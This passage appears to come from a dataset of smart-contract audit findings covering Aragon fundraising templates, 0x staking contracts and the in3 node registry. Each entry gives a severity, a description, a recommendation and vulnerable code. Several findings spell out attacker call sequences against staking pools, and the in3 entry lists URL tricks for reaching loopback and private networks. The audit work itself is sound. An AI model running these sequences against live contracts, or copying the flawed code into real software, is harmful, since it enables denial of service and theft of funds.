`UPDATE_RESERVE_ROLE` permission. The permission is currently not assigned in the template.\\nThe reserve is being referenced by multiple Contracts. `Tap` interacts with it to transfer funds to the beneficiary, `Controller` adds new protected tokens, and `MarketMaker` transfers funds when someone sells their Shareholder token.\\nUpdating reserve only in `Tap` is inconsistent with the system as the other contracts are still referencing the old reserve unless they are updated via the Aragon Application update mechanisms.\\n```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\nчRemove the possibility to update reserve in `Tap` to keep the system consistent. Provide information about update mechanisms in case the reserve needs to be updated for all components.чч```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\n -Presale can be opened earlier than initially assigned dateчmediumчThere are 2 ways how presale opening date can be assigned. 
Either it's defined on initialization or the presale will start when `open()` function is executed.\\n```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n\\nThe problem is that even if `openDate` is assigned to some non-zero date, it can still be opened earlier by calling `open()` function.\\n```\\nfunction open() external auth(OPEN\\_ROLE) {\\n require(state() == State.Pending, ERROR\\_INVALID\\_STATE);\\n\\n \\_open();\\n}\\n```\\nчRequire that `openDate` is not set (0) when someone manually calls the `open()` function.чч```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n -Presale - should not allow zero value contributionsчlowчThe Presale accepts zero value contributions emitting a contribution event if none of the Aragon components (TokenManager, MinimeToken) raises an exception.\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\nчReject zero value `ETH` or `ERC20` contributions.чч```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\n -FundraisingMultisigTemplate - should use BaseTemplate._createPermissionForTemplate() to assign permissions to itselfчlowчThe template temporarily assigns permissions to itself to be able to configure parts of the system. 
This can either be done by calling `acl.createPermission(address(this), app, role, manager)` or by using a distinct method provided with the DAO-Templates BaseTemplate `_createPermissionForTemplate`.\\nWe suggest that in order to make it clear that permissions are assigned to the template and make it easier to audit that permissions are either revoked or transferred before the DAO is transferred to the new user, the method provided and used with the default Aragon DAO-Templates should be used.\\nuse `createPermission` if permissions are assigned to an entity other than the template contract.\\nuse `_createPermissionForTemplate` when creating permissions for the template contract.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n\\nSidenote: pass `address(this)` instead of the contract instance to `createPermission`.чResolution\\nFixed with AragonBlack/[email protected]dd153e0.\\nUse `BaseTemplate._createPermissionForTemplate` to assign permissions to the template.чч```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n -FundraisingMultisigTemplate - misleading commentsчlowчThe comment mentions ADD_PROTECTED_TOKEN_ROLE but permissions for `ADD_COLLATERAL_TOKEN_ROLE` are created.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n\\n```\\n// transfer ADD\\_PROTECTED\\_TOKEN\\_ROLE\\n\\_transferPermissionFromTemplate(acl, controller, shareVoting, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), shareVoting);\\n```\\nч`ADD_PROTECTED_TOKEN_ROLE` in the comment should be `ADD_COLLATERAL_TOKEN_ROLE`.чч```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, 
controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n -FundraisingMultisigTemplate - unnecessary cast to addressчlowчThe addresses of DAI (argument `address` _dai) and ANT (argument `address` _ant) are unnecessarily cast to `address`.\\n```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\nчBoth arguments are already of type `address`, therefore remove the explicit cast to `address()` when pushing to the `collaterals` array.чч```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\n -FundraisingMultisigTemplate - DAI/ANT token address cannot be zeroчlowчThe fundraising template is configured with the `DAI` and `ANT` token address upon deployment and checks if the provided addresses are valid. The check performed is `_ensureTokenIsContractOrETH()` which allows the `address(0)` (constant for ETH) for the token contracts. 
However, `address(0)` is not a valid option for either `DAI` or `ANT` and the contract expects a valid token address to be provided as the deployment of a new DAO will have unexpected results (collateral `ETH` is added instead of an ERC20 token) or fail (DAI == `ANT` == 0x0).\\n```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n\\n```\\n function \\_ensureTokenIsContractOrETH(address \\_token) internal view returns (bool) {\\n require(isContract(\\_token) || \\_token == ETH, ERROR\\_BAD\\_SETTINGS);\\n}\\n```\\nчResolution\\nFixed with AragonBlack/[email protected]da561ce.\\nUse `isContract()` instead of `_ensureTokenIsContractOrETH()` and optionally require that `collateral[0] != collateral[1]` as an additional check to prevent that the fundraising template is being deployed with an invalid configuration.чч```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n -Anyone can remove a maker's pending pool join statusчhighчUsing behavior described in https://github.com/ConsenSys/0x-v3-staking-audit-2019-10/issues/11, it is possible to delete the pending join status of any maker in any pool by passing in `NIL_POOL_ID` to `removeMakerFromStakingPool`. Note that the attacker in the following example must not be a confirmed member of any pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, makerAddress)`. In this case, `makerAddress` can be almost any address, as long as it has not called `joinStakingPoolAsMaker` (an easy example is address(0)). The key goal of this call is to increment the number of makers in pool 0:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, targetAddress)`. This function queries `getStakingPoolIdOfMaker(targetAddress)` and compares it to the passed-in pool id. 
Because the target is an unconfirmed maker, their staking pool id is NIL_POOL_ID:\\n```\\nbytes32 makerPoolId = getStakingPoolIdOfMaker(makerAddress);\\nif (makerPoolId != poolId) {\\n LibRichErrors.rrevert(LibStakingRichErrors.MakerPoolAssignmentError(\\n LibStakingRichErrors.MakerPoolAssignmentErrorCodes.MakerAddressNotRegistered,\\n makerAddress,\\n makerPoolId\\n ));\\n}\\n```\\n\\nThe check passes, and the target's `_poolJoinedByMakerAddress` struct is deleted. Additionally, the number of makers in pool 0 is decreased:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nThis can be used to prevent any makers from being confirmed into a pool.чSee `issue 5.6`.чч```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n -MixinParams.setParams bypasses safety checks made by standard StakingProxy upgrade path.чmediumчThe staking contracts use a set of configurable parameters to determine the behavior of various parts of the system. The parameters dictate the duration of epochs, the ratio of delegated stake weight vs operator stake, the minimum pool stake, and the Cobb-Douglas numerator and denominator. 
These parameters can be configured in two ways:\\n```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n\\nAn authorized address can call `MixinParams.setParams` at any time and set the contract's parameters to arbitrary values.\\nThe latter method introduces the possibility of setting unsafe or nonsensical values for the contract parameters: `epochDurationInSeconds` can be set to 0, `cobbDouglassAlphaNumerator` can be larger than `cobbDouglassAlphaDenominator`, `rewardDelegatedStakeWeight` can be set to a value over 100% of the staking reward, and more.\\nNote, too, that by using `MixinParams.setParams` to set all parameters to 0, the `Staking` contract can be re-initialized by way of `Staking.init`. Additionally, it can be re-attached by way of `StakingProxy.attachStakingContract`, as the delegatecall to `Staking.init` will succeed.чResolution\\nThis is fixed in 0xProject/0x-monorepo#2279. 
Now the parameter validity is asserted in `setParams()`.\\nEnsure that calls to `setParams` check that the provided values are within the same range currently enforced by the proxy.чч```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n -Authorized addresses can indefinitely stall ZrxVaultBackstop catastrophic failure modeчmediumчThe `ZrxVaultBackstop` contract was added to allow anyone to activate the staking system's “catastrophic failure” mode if the `StakingProxy` is in “read-only” mode for at least 40 days. To enable this behavior, the `StakingProxy` contract was modified to track the last timestamp at which “read-only” mode was activated. 
This is done by way of StakingProxy.setReadOnlyMode:\\n```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n\\nBecause the timestamp is updated even if “read-only” mode is already active, any authorized address can prevent `ZrxVaultBackstop` from activating catastrophic failure mode by repeatedly calling `setReadOnlyMode`.чIf “read-only” mode is already active, `setReadOnlyMode(true)` should result in a no-op.чч```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n -Pool 0 can be used to temporarily prevent makers from joining another poolчmediumч`removeMakerFromStakingPool` reverts if the number of makers currently in the pool is 0, due to `safeSub` catching an underflow:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nBecause of this, edge behavior described in issue 5.6 can allow an attacker to temporarily prevent makers from joining a pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, victimAddress)`. 
This sets the victim's `MakerPoolJoinStatus.confirmed` field to `true` and increases the number of makers in pool 0 to 1:\\n```\\npoolJoinStatus = IStructs.MakerPoolJoinStatus({\\n poolId: poolId,\\n confirmed: true\\n});\\n\\_poolJoinedByMakerAddress[makerAddress] = poolJoinStatus;\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, randomAddress)`. The net effect of this call simply decreases the number of makers in pool 0 by 1, back to 0:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nTypically, the victim should be able to remove themselves from pool 0 by calling `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, but because the attacker can set the pool's number of makers to 0, the aforementioned underflow causes this call to fail. The victim must first understand what is happening in `MixinStakingPool` before they are able to remedy the situation:\\nThe victim must call `addMakerToStakingPool(NIL_POOL_ID, randomAddress2)` to increase pool 0's number of makers back to 1.\\nThe victim can now call `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, and remove their confirmed status.\\nAdditionally, if the victim in question currently has a pending join, the attacker can use issue 5.1 to first remove their pending status before locking them in pool 0.чSee issue 5.1.чч```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n -Recommendation: Fix weak assertions in MixinStakingPool stemming from use of NIL_POOL_IDчmediumчThe modifier `onlyStakingPoolOperatorOrMaker(poolId)` is used to authorize actions taken on a given pool. The sender must be either the operator or a confirmed maker of the pool in question. 
However, the modifier queries `getStakingPoolIdOfMaker(maker)`, which returns `NIL_POOL_ID` if the maker's `MakerPoolJoinStatus` struct is not confirmed. This implicitly makes anyone a maker of the nonexistent “pool 0”:\\n```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n\\n`joinStakingPoolAsMaker(poolId)` makes no existence checks on the provided pool id, and allows makers to become pending makers in nonexistent pools.\\n`addMakerToStakingPool(poolId, maker)` makes no existence checks on the provided pool id, allowing makers to be added to nonexistent pools (as long as the sender is an operator or maker in the pool).чAvoid use of `0x00...00` for `NIL_POOL_ID`. Instead, use `2**256 - 1`.\\nImplement stronger checks for pool existence. 
Each time a pool id is supplied, it should be checked that the pool id is between 0 and `nextPoolId`.\\n`onlyStakingPoolOperatorOrMaker` should revert if `poolId` == `NIL_POOL_ID` or if `poolId` is not in the valid range: (0, nextPoolId).чч```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n -LibFixedMath functions fail to catch a number of overflowsчmediumчThe `__add()`, `__mul()`, and `__div()` functions perform arithmetic on 256-bit signed integers, and they all miss some specific overflows.\\nAddition Overflows\\n```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe two overflow conditions it tests for are:\\nAdding two positive numbers shouldn't result in a negative number.\\nAdding two negative numbers shouldn't result in a positive number.\\n`__add(-2**255, -2**255)` returns `0` without reverting because the overflow didn't match either of the above conditions.\\nMultiplication Overflows\\n```\\n/// @dev Returns the multiplication two numbers, reverting on overflow.\\nfunction \\_mul(int256 a, int256 b) private pure returns (int256 c) {\\n if (a == 0) {\\n return 0;\\n }\\n c = a \\* b;\\n if (c / a != b) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n 
LibFixedMathRichErrors.BinOpErrorCodes.MULTIPLICATION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe function checks via division for most types of overflows, but it fails to catch one particular case. `__mul(-2**255, -1)` returns `-2**255` without error.\\nDivision Overflows\\n```\\n/// @dev Returns the division of two numbers, reverting on division by zero.\\nfunction \\_div(int256 a, int256 b) private pure returns (int256 c) {\\n if (b == 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.DIVISION\\_BY\\_ZERO,\\n a,\\n b\\n ));\\n }\\n c = a / b;\\n}\\n```\\n\\nIt does not check for overflow. Due to this, `__div(-2**255, -1)` erroneously returns `-2**255`.чFor addition, the specific case of `__add(-2**255, -2**255)` can be detected by using a `>= 0` check instead of `> 0`, but the below seems like a clearer check for all cases:\\n```\\n// if b is negative, then the result should be less than a\\nif (b < 0 && c >= a) { /\\* subtraction overflow \\*/ }\\n\\n// if b is positive, then the result should be greater than a\\nif (b > 0 && c <= a) { /\\* addition overflow \\*/ }\\n```\\n\\nFor multiplication and division, the specific values of `-2**255` and `-1` are the only missing cases, so that can be explicitly checked in the `__mul()` and `__div()` functions.чч```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n -Misleading MoveStake event when moving stake from UNDELEGATED to UNDELEGATEDчlowчAlthough moving stake between the same status 
(UNDELEGATED <=> UNDELEGATED) should be a no-op, calls to `moveStake` succeed even for invalid `amount` and nonsensical `poolId`. The resulting `MoveStake` event can log garbage, potentially confusing those observing events.\\nWhen moving between `UNDELEGATED` and `UNDELEGATED`, each check and function call results in a no-op, save the final event:\\nNeither `from` nor `to` are `StakeStatus.DELEGATED`, so these checks are passed:\\n```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n\\nThe primary state changing function, `_moveStake`, immediately returns because the `from` and `to` balance pointers are equivalent:\\n```\\nif (\\_arePointersEqual(fromPtr, toPtr)) {\\n return;\\n}\\n```\\n\\nFinally, the `MoveStake` event is invoked, which can log completely invalid values for `amount`, `from.poolId`, and to.poolId:\\n```\\nemit MoveStake(\\n staker,\\n amount,\\n uint8(from.status),\\n from.poolId,\\n uint8(to.status),\\n to.poolId\\n);\\n```\\nчIf `amount` is 0 or if moving between `UNDELEGATED` and `UNDELEGATED`, this function should no-op or revert. An explicit check for this case should be made near the start of the function.чч```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n -Remove unneeded fields from StoredBalance and Pool structsчlowчResolution\\nThis is fixed in 0xProject/0x-monorepo#2248. 
As part of a larger refactor, these fields were removed.\\nBoth structs have fields that are only written to, and never read:\\nStoredBalance.isInitialized:\\n```\\nbool isInitialized;\\n```\\n\\nPool.initialized:\\n```\\nbool initialized;\\n```\\nчThe unused fields should be removed.чч```\\nbool isInitialized;\\n```\\n -Pool IDs can just be incrementing integersчlowчPool IDs are currently `bytes32` values that increment by `2**128`. After discussion with the development team, it seems that this was in preparation for a feature that was ultimately not used. Pool IDs should instead just be incrementing integers.\\n```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n\\n```\\n/// @dev Computes the unique id that comes after the input pool id.\\n/// @param poolId Unique id of pool.\\n/// @return Next pool id after input pool.\\nfunction \\_computeNextStakingPoolId(bytes32 poolId)\\n internal\\n pure\\n returns (bytes32)\\n{\\n return bytes32(uint256(poolId).safeAdd(POOL\\_ID\\_INCREMENT\\_AMOUNT));\\n}\\n```\\nчResolution\\nThis is fixed in 0xProject/0x-monorepo#2250. Pool IDs now start at 1 and increment by 1 each time.\\nMake pool IDs `uint256` values and simply add 1 to generate the next ID.чч```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. 
See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n -LibProxy.proxyCall() may overwrite important memoryчlowч`LibProxy.proxyCall()` copies from call data to memory, starting at address 0:\\n```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n }\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n\\nThe first 64 bytes of memory are treated as “scratch space” by the Solidity compiler. Writing beyond that point is dangerous, as it will overwrite the free memory pointer and the “zero slot” which is where length-0 arrays point.\\nAlthough the current callers of `proxyCall()` don't appear to use any memory after calling `proxyCall()`, future changes to the code may introduce very serious and subtle bugs due to this unsafe handling of memory.чUse the actual free memory pointer to determine where it's safe to write to memory.чч```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n }\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n -NodeRegistry - URL can be arbitrary dns resolvable names, IP's and even localhost or private subnetsчhighчAs outlined in issue 6.9 the `NodeRegistry` allows anyone to register nodes with 
arbitrary URLs. The `url` is then used by `in3-server` or clients to connect to other nodes in the system. Signers can only be convicted if they sign wrong blockhashes. However, if they never provide any signatures they can stay in the registry for as long as they want and sabotage the network. The Registry implements an admin functionality that is available for the first year to remove misbehaving nodes (or spam entries) from the Registry. However, this is insufficient as an attacker might just re-register nodes after the minimum timeout they specify or spend some more finneys on registering more nodes. Depending on the eth-price this will be more or less profitable.\\nFrom an attacker's perspective the `NodeRegistry` is a good source of information for reconnaissance, allows to de-anonymize and profile nodes based on dns entries or netblocks or responses to `in3_stats` (https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/49), makes a good list of targets for DoS attacks on the system or makes it easy to exploit nodes for certain yet unknown security vulnerabilities.\\nSince nodes and potentially clients (not in scope) do not validate the rpc URL received from the `NodeRegistry` they will try to connect to whatever is stored in a node's `url` entry.\\ncode/in3-server/src/chains/signatures.ts:L58-L75\\n```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ?
cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: '2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n\\nThis allows for a wide range of attacks not limited to:\\nAn attacker might register a node with an empty or invalid URL. The `in3-server` does not validate the URL and therefore will attempt to connect to the invalid URL, spending resources (cpu, file-descriptors, ..) to find out that it is invalid.\\nAn attacker might register a node with a URL that is pointing to another node's rpc endpoint and specify weights that suggest that it is capable of service a lot of requests to draw more traffic towards that node in an attempt to cause a DoS situation.\\nAn attacker might register a node for a http/https website at any port in an extortion attempt directed to website owners. The incubed network nodes will have to learn themselves that the URL is invalid and they will at least attempt to connect the website once.\\nAn attacker might update the node information in the `NodeRegistry` for a specific node every block, providing a new `url` (or a slightly different URLs issue 6.9) to avoid client/node URL blacklists.\\nAn attacker might provide IP addresses instead of DNS resolvable names with the `url` in an attempt to draw traffic to targets, avoiding canonicalization and blacklisting features.\\nAn attacker might provide a URL that points to private IP netblocks for IPv4 or IPv6 in various formats. 
Combined with the ability to ask another node to connect to an attacker defined `url` (via blockproof, signatures[] -> signer_address -> signer.url) this might allow an attacker to enumerate services in the LAN of node operators.\\nAn attacker might provide the loopback IPv4, IPv6 or resolvable name as the URL in an attempt to make the node connect to local loopback services (service discovery, bypassing authentication for some local running services - however this is very limited to the requests nodes may execute).\\nURLs may be provided in various formats: resolvable dns names, IPv4, IPv6 and depending on the http handler implementation even in Decimal, Hex or Octal form (i.e. http://2130706433/)\\nA valid DNS resolvable name might point to a localhost or private IP netblock.\\nSince none of the rpc endpoints provide signatures they cannot be convicted or removed (unless the `unregisterKey` does it within the first year. However, that will not solve the problem that someone can re-register the same URLs over and over again)чResolution\\nThis issue has been addressed with the following commits:\\nIt is a design decision to base the Node registry on URLs (DNS resolvable names). This has the implications outlined in this issue and they cannot easily be mitigated. Adding a delay until nodes can be used after registration only delays the problem. Assuming that an entity curates the registry or a whitelist is in place centralizes the system. Adding DNS record verification still allows an owner of a DNS entry to point its name to any IP address they would like it to point to. It certainly makes it harder to add RPC URLs with DNS names that are not in control of the attacker but it also adds a whole lot more complexity to the system (including manual steps performed by the node operator). 
In the end, the system allows IP based URLs in the registry which cannot be used for DNS validation.\\nIt is a fundamental design decision of the system architecture to allow rpc urls in the Node Registry, therefore this issue can only be partially mitigated unless the system design is reworked. It is therefore suggested to add checks to both the registry contract (coarse validation to avoid adding invalid urls) and node implementations (rigorous validation of URL's and resolved IP addresses) and filter out any potentially harmful destinations.чч```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ? cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: 